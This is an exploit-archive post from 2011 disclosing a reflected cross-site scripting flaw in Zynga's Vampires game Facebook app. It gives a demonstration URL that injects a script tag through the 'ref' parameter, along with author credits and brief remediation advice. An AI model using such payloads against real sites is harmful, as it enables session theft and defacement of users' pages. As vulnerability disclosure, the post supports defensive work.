Home / exploits Zynga Vampiresgame Cross Site Scripting
Posted on 30 August 2011
_______ ________________ __ _____________ _______ _ _ \______ | _/_ \______ __ _ __ \_ __ / /_ / /_ / / |/ /| | / / ______ / / / | | / \_/ \_/ / /| < | | / / /_____/ / |__| \_____ /\_____ /____/ |__|_ |___| /____/ /\_/ / / / ------------------------------------------------------------------------------------------------------------------------------------------------- TITLE: Reflected XSS bug in ZYNGA vampiresgame(facebook apps) vendor: www.apps.facebook.com/petvillegame/**[] <http://www.apps.facebook.com/petvillegame/**%5B%5D> Author: r007k17-w a.k.a Raghavendra Karthik.D Email: n4gb07@gmail.com My blog: http://shadowrootkit.wordpress.com/ Google Dork: Copyright 2010 Zynga Game Network Inc ------------------------------------------------------------------------------------------------------------------------------------------------------------- DEMO: http://apps.facebook.com/vampiresgame/index.php?ref="><script>alert("r007k17-w")</script> SUG: HTML encoding, escaping special characters,Input sanitization. ------------------------------------------------------------------------------------------------------------------------------------------------------------- gr33t1ngs to s1d3-3ff3cts,3psilonlambda and all my friends
